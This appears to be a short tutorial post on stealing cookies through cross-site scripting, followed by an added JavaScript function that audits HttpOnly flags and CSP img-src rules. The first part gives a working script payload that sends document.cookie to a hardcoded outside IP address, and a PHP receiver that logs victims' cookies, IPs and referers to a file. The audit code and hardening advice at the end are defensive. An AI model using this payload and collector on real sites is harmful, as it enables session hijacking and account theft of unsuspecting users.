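Principle: on a website with an XSS vulnerability, we can inject XSS code that makes a request to our own site, so that when a user triggers the vulnerability their cookie is passed to us and we receive it.
Implementation:
Attack code: <script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>
Remote receiving code: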
<?php
$cookie = $_GET['cookie'];
$ip = getenv('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookie.txt','a');
fwrite($fp,"IP:".$ip." | Date And Time:".$time." | Referer:".$referer." | Cookie:".$cookie." ||| ");
fclose($fp);
?>
The end result is that the user's cookie is stolen through the XSS vulnerability.
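The payload above depends on two conditions: the cookie must be readable through document.cookie (no HttpOnly flag), and the browser must be allowed to load an image from an arbitrary host. The following is an added example, not part of the original post, that audits a response's Set-Cookie and Content-Security-Policy headers for both conditions; the function names and sample header values are constructed for illustration.

```javascript
// Added example: check response headers for the two conditions the payload relies on.
// Function names and the sample headers below are constructed, not from the original post.

// Parse one Set-Cookie header value into { name, httpOnly, secure, sameSite }.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const flags = {};
  for (const a of attrs) {
    const [k, v] = a.split('=');
    flags[k.trim().toLowerCase()] = v === undefined ? true : v.trim();
  }
  return {
    name,
    httpOnly: flags.httponly === true,
    secure: flags.secure === true,
    sameSite: typeof flags.samesite === 'string' ? flags.samesite : null,
  };
}

// Return the CSP source list that governs <img> loads:
// img-src if present, otherwise default-src, otherwise null (no restriction).
function imgSources(csp) {
  if (!csp) return null;
  const directives = {};
  for (const d of csp.split(';')) {
    const [name, ...values] = d.trim().split(/\s+/);
    const key = (name || '').toLowerCase();
    // Per the CSP spec, only the first occurrence of a directive counts.
    if (key && !(key in directives)) directives[key] = values;
  }
  return directives['img-src'] || directives['default-src'] || null;
}

// Report cookies that script can read and whether images may load from any host.
function auditResponse(setCookieHeaders, csp) {
  const scriptReadableCookies = setCookieHeaders
    .map(parseSetCookie).filter(c => !c.httpOnly).map(c => c.name);
  const srcs = imgSources(csp);
  const imgUnrestricted = srcs === null ||
    srcs.some(s => ['*', 'http:', 'https:'].includes(s.toLowerCase()));
  return { scriptReadableCookies, imgUnrestricted };
}

// Constructed sample: session cookie lacks HttpOnly, and img-src allows any https host.
console.log(auditResponse(
  ['PHPSESSID=abc123; Path=/', 'csrf=xyz; Path=/; HttpOnly; Secure; SameSite=Lax'],
  "default-src 'self'; img-src 'self' https:"));
```

A cookie listed in scriptReadableCookies should be reissued with HttpOnly if it carries a session; imgUnrestricted being true means img-src should be narrowed to the hosts the site actually uses.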